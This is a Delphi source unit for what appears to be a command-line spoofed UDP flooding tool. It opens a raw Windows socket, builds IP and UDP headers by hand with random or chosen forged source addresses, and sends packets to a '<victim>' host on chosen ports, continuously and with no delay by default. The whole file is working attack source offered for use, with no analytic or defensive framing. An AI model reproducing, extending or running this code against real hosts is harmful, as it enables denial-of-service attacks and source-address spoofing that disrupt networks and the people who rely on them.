unit u_main;

interface

uses
  u_winsck2, u_sysutils, u_sockhdr;

type
  TPortList = array of Word;
  
  TSufOptions = packed record
    Data: PChar;
    Delay, Source: Cardinal;
    dstPortList: TPortList;
    HedefAdres: TSockAddrIn;
    DataSize, Num, RandomSeek, PacketSize, Sended: Integer;
    Socket: TSocket;
    srcPort: Word;
    UseData: Boolean;
  end;

var
  SufOpt: TSufOptions;

  function GetRandomIP: Cardinal;
  function GetPorts(Ports: string): TPortList;
  function GetRandomValue(const Range: Integer): Integer;
  function Gonder(s: TSocket; var Buf; len, flags: Integer;
    var addrto: TSockAddr; tolen: Integer): Integer;
  function Resolve(const host: PChar): Cardinal;
  procedure CreateSocket;
  procedure LoadDataFile(const FileName: string);
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure SendSuf(const Port: Word);
  procedure SendSuf_FillIPhdr(const IPhdr: PIPhdr);
  procedure SendSuf_FillUDPhdr(const UDPhdr: PUDPhdr; const IPhdr: PIPhdr;
    const dstport: Word);
  procedure Usage(const Path: string);

implementation

function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

function GetPorts(Ports: string): TPortList;
  procedure AddPort(const APort: string);
  var
    Port: integer;
  begin
    Port := StrtoIntDef(APort, -1);
    if (Port > -1) and (Port < 65536) then
    begin
      SetLength(Result, Length(Result) + 1);
      Result[High(Result)] := Port;
    end
      else Writeln('Skipping invalid port: ' + APort);
  end;
var
  CommaPos: Integer;
  Port: string;
begin
  CommaPos := Pos(',', Ports);
  while CommaPos > 0 do
  begin
    Port := Copy(Ports, 1, CommaPos - 1);
    AddPort(Port);
    Delete(Ports, 1, CommaPos);
    CommaPos := Pos(',', Ports);
  end;
  AddPort(Ports); 
end;

function GetRandomValue(const Range: Integer): Integer;
begin                                            
  Random;
  Inc(SufOpt.RandomSeek);
  Result := (Random(High(Integer)) + SufOpt.RandomSeek*$FFFF) mod Range;
end;

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
  tolen: Integer): Integer; 
var
  LastError: Integer;
begin
  WSASetLastError(0);
  Result := Sendto(s, Buf, len, flags, addrto, tolen); 
  LastError := WSAGetLastError;
  if LastError <> 0 then
    Writeln('Unable to send udp packet. Error code: ' + InttoStr(LastError));
end;

function Resolve(const host: PChar): Cardinal; 
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host);
  if InAddr.S_addr = INADDR_NONE then
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then 
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length);
  end;
  Result := InAddr.S_addr;
end;

procedure CreateSocket;
begin
  SufOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if SufOpt.Socket = INVALID_SOCKET then
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(SufOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', 4) <> 0 then
  begin 
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

procedure LoadDataFile(const FileName: string);
var
  DataFile: file;
begin
  if not ValidFile(DataFile, FileName) then
  begin
    if not ValidFile(DataFile, ExtractFilePath(ParamStr(0)) + FileName) then
    begin
      Writeln('Unable to load data file: ' + FileName);
      Halt(0);
    end;
  end;
  Seek(DataFile, 0);
  SufOpt.DataSize := FileSize(DataFile);
  SufOpt.Data := AllocMem(SufOpt.DataSize);
  {$I-}
  try
    BlockRead(DataFile, SufOpt.Data^, SufOpt.DataSize);
    SufOpt.UseData := True;
  except
    Writeln('An error occured on reading data file');
  end;
  {$I+}
  CloseFile(DataFile);
end;

procedure SetDefaultOptions;
begin
  SufOpt.HedefAdres.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  SufOpt.HedefAdres.sin_family := AF_INET;
  SufOpt.PacketSize := 64;
  SetLength(SufOpt.dstPortList, 1);
  SufOpt.dstPortList[0] := 7;
end;

procedure SetParams;
var
  i: Integer;
  pstr: string;
  Ch: Char;
begin
  for i := 2 to ParamCount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
      if pstr[1] = '-' then
        Ch := pstr[2]; 
    if Ch = #0 then Continue;
    case Ch of
      'S': SufOpt.Source := Resolve(PChar(ParamStr(i + 1)));
      'p':
        begin
          SufOpt.dstPortList := GetPorts(ParamStr(i + 1));
          if Length(SufOpt.dstPortList) = 0 then
          begin
            Writeln('No valid ports found on the list'#13#10 +
                    'Using port 7 instead'
                    );
            SetLength(SufOpt.dstPortList, 1);
            SufOpt.dstPortList[0] := 7;
          end;
        end;
      's': SufOpt.srcPort := StrtoIntDef(ParamStr(i + 1), 0);
      'D': SufOpt.DataSize := StrtoIntDef(ParamStr(i + 1), 64);
      'f': LoadDataFile(ParamStr(i + 1));
      'n': SufOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': SufOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

var
  Len: Integer = 28;
  Buf: array of Char;
  
procedure SendSuf(const Port: Word);
var
  IPhdr: PIPhdr;
  UDPhdr: PUDPhdr;
begin
  if Length(Buf) = 0 then
  begin
    if SufOpt.UseData then
      Inc(Len, SufOpt.DataSize)
    else
      Inc(Len, SufOpt.PacketSize);
    SetLength(Buf, Len)
  end;
  FillChar(Buf[0], Length(Buf), 0);
  IPhdr := @Buf[0];
  UDPhdr := @Buf[20];
  if SufOpt.UseData then
    Move(SufOpt.Data^, Buf[28], SufOpt.DataSize);
  SendSuf_FillIPhdr(IPhdr);
  SendSuf_FillUDPhdr(UDPhdr, IPhdr, Port);
  Gonder(SufOpt.Socket, Buf[0], Len, 0, SufOpt.HedefAdres, Sizeof(SufOpt.HedefAdres));
end;

procedure SendSuf_FillIPhdr(const IPhdr: PIPhdr);
begin
  IPhdr.ip_verlen := $45;
  IPhdr.ip_tos := 60;
  IPhdr.ip_len := htons(Len);
  IPhdr.ip_id := htons(GetRandomValue(65535) + 1);
  IPhdr.ip_ttl := 255;
  IPhdr.ip_p := 17;
  if SufOpt.Source = 0 then
    IPhdr.ip_src := GetRandomIP
  else
    IPhdr.ip_src := SufOpt.Source;
  IPhdr.ip_dst := SufOpt.HedefAdres.sin_addr.S_addr;
  IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
  SufOpt.HedefAdres.sin_addr.S_addr := IPhdr.ip_dst;
end;

procedure SendSuf_FillUDPhdr(const UDPhdr: PUDPhdr; const IPhdr: PIPhdr;
  const dstport: Word);
var
  seudoBuf: PChar;
  pseudo: Ppseudohdr_udp;
begin
  seudoBuf := AllocMem(Len - 8);
  try
    pseudo := Ppseudohdr_udp(seudoBuf);
    if SufOpt.srcPort = 0 then
      UDPhdr.udp_sport := htons(GetRandomValue(65535) + 1)
    else
      UDPhdr.udp_sport := htons(SufOpt.srcPort);
    if dstport = 0 then
      UDPhdr.udp_dport := htons(GetRandomValue(65535) + 1)
    else
      UDPhdr.udp_dport := htons(dstport);
    UDPhdr.udp_ulen := htons(Len - 20);
    if SufOpt.UseData then
      Move(SufOpt.Data^, (seudoBuf + 20)^, SufOpt.DataSize);
    pseudo.saddr := IPhdr.ip_src;
    pseudo.daddr := IPhdr.ip_dst;
    pseudo.protocol := IPhdr.ip_p;
    pseudo.length := UDPhdr.udp_ulen;
    pseudo.udphdr := UDPhdr^;
    UDPhdr.udp_sum := CheckSum(@seudoBuf^, Len - 8);
  finally
    FreeMem(seudoBuf);
  end;
  SufOpt.HedefAdres.sin_port := UDPhdr.udp_dport;
end;

procedure Usage(const Path: string); 
begin
  Write(
        'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -S     Spoof host                         (0 is random (default))'#13#10 +
        '  -p:    Comma separated list of dest ports (default 7) (0 is random)'#13#10 +
        '  -s:    Source port                        (0 is random (default))'#13#10 +
        '  -D:    Data size in bytes                 (default 64)'#13#10 +
        '  -f:    Filename containg data             (not needed)'#13#10 +
        '  -n:    Num of packets to send             (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)                      (default 0)'#13#10
       );
  Halt(0);
end;

end.
